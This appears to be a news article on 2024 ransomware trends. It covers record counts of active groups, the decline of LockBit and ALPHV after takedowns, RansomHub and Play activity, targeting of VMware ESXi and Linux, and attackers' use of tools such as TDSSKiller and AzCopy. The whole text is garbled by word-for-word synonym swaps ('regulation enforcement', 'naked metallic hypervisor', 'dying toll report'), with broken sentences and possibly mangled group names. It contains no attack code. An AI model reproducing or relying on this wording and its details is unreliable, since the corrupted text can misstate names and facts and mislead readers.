This yr noticed the biggest variety of energetic ransomware teams ever recorded, with 58 assaults on world companies within the second quarter. Threat intelligence platform supplier Cyberint reported solely a slight decline within the third quarter, with 57 energetic teams.
Furthermore, within the third quarter, the highest 10 ransomware teams had been chargeable for solely 58.3% of all detected assaults. This displays each the rise within the variety of energetic teams basically, and a decline in exercise from bigger gamers due to profitable regulation enforcement takedown operations, resembling these of ALPHV and Dispropriator.
Adi Bleih, safety researcher at Cyberint, instructed TechRepublic in an e-mail: “The variety of energetic ransomware teams reaching an all-time excessive signifies that firms face a higher threat of assaults as every of those competing gangs should now compete for goals. Competition between totally different ransomware teams has fueled more and more frequent assaults, leaving little or no margin for error on the a part of company cybersecurity groups.
“While safety gaps and vulnerabilities might have beforehand gone unnoticed, the proliferation of ransomware teams, scouring the net for his or her subsequent victims, signifies that even minor errors can now shortly result in main safety incidents.”
The most prolific ransomware teams are succumbing to regulation enforcement operations
In reality, separate analysis from WithSecure discovered that of the 67 ransomware teams tracked in 2023, 31 had been not operational as of the second quarter of 2024. NCC Group additionally famous a year-over-year decline in ransomware attacks in each June and July this yr, which experts linked to LockBit outage.
WATCH: LockBit comes again on-line as ransomware gang continues to conflict with regulation enforcement
LockBit particularly was accountable for almost all of assaults, however with simply 85 assaults within the third quarter it attacked almost 60% fewer firms than within the second quarter. The Cyberint report. This marks the group’s lowest variety of quarterly assaults in a yr and a half.
A August report Malwarebytes additionally discovered that over the previous yr, the proportion of ransomware assaults claimed by LockBit has dropped from 26% to twenty%, regardless of extra particular person assaults being carried out.
ALPHV, the second most prolific ransomware group, additionally created a emptiness after a sloppily executed cyberattack towards Change Healthcare in February. The group didn’t pay an affiliate his proportion of the $22 million ransom, so the affiliate uncovered them, prompting ALPHV to pretend a regulation enforcement takeover and stop operations.
SEE: Timeline: 15 Noteworthy Cyber Attacks and Data Breaches
These observations counsel that regulation enforcement actions are proving efficient towards extra established gangs, whereas opening up new alternatives for smaller teams. Malwarebytes analysts added that the brand new gangs “will definitely search to draw their associates and supplant them because the dominant forces in ransomware.”
But analysts at Cyberint are optimistic concerning the ripple impact of takedown operations on smaller gamers, writing: “As these giant operations wrestle, it is solely a matter of time earlier than different ransomware teams giant and small observe the identical path . The ongoing crackdown has created a extra hostile setting for these teams, signaling that their dominance might not final lengthy.”
In reality, as a substitute of continuous the upward pattern ranging from the second quarter, the place the variety of ransomware assaults elevated increased by almost 21.5%Cyberint researchers discovered that the 1,209 instances within the third quarter truly marked a decline of 5.5%.
SEE: Global cyber assaults will double from 2020 to 2024, report finds
The quarter’s prime ransomware group was RansomHub, chargeable for 16.1% of all instances and claiming 195 new victims. The most notable assaults embrace these towards world producer Kawasaki and oil and fuel providers firm Halliburton. Cyberint analysts say the group’s roots are possible in Russia and that it has hyperlinks to former associates of the now-inactive ALPHV group.
In second place on the record of essentially the most energetic ransomware teams is Play, which claimed 89 victims and seven.9% of all instances. It has allegedly carried out over 560 profitable assaults since June 2022, with the largest one being this yr intended for the VMWare ESXi environment.
“If left unhindered, Play will surpass its annual dying toll report in 2024 (301),” the analysts wrote.
Ransomware teams concentrating on Linux and VMWare ESXi techniques
The Cyberint report famous a pattern that ransomware teams are focusing closely on concentrating on Linux-based techniques and VMware ESXi servers.
VMware ESXi is a naked metallic hypervisor that allows the creation and administration of digital machines immediately on server {hardware}, which might embrace essential servers. Compromising the hypervisor can permit attackers to disable a number of digital machines without delay and take away restoration choices resembling snapshots or backups, leading to a major influence on an organization’s operations.
Ransomware teams Play and Cicada3301 have developed ransomware that particularly targets VMWare ESXi servers, whereas Black Basta has exploited vulnerabilities that permit them to encrypt all files for VMs.
WATCH: Black Basta ransomware has affected greater than 500 organizations worldwide
Linux techniques additionally usually host digital machines and different essential enterprise infrastructure. This consideration highlights the curiosity of cyber attackers within the huge achieve that may be obtained from finishing up most injury on company networks.
Attackers use customized malware and exploit reputable instruments
The sophistication of ransomware teams’ methods has elevated significantly over the previous yr, with Cyberint researchers observing attackers utilizing customized malware to bypass safety instruments. For instance, the Black Basta gang used a number of custom tools after gaining preliminary entry to the goal environments.
Attackers additionally exploit reputable safety and cloud storage instruments to evade detection. RansomHub was observed using Kaspersky’s TDSSKiller rootkit remover to disable endpoint detection and response, and LaZagne password restoration software to reap credentials. More, multiple groups used Microsoft’s Azure Storage Explorer and AzCopy instruments to steal company knowledge and retailer it in a cloud-based infrastructure.
Bleih instructed TechRepublic: “As these gangs grow to be extra profitable and well-funded, they grow to be more and more refined and function equally to a reputable enterprise. While we frequently see the identical tried and examined assault vectors used – phishing assaults, use of stolen credentials, exploiting vulnerabilities on assets uncovered on the web – they’re turning into extra inventive in how they execute these frequent methods.
“They are additionally turning into more and more agile and scalable. For instance, whereas risk actors have at all times been technically savvy, they’re now in a position to start exploiting new vulnerabilities at scale inside days of a essential CVE being documented. In the previous, this might need taken weeks or maybe longer.
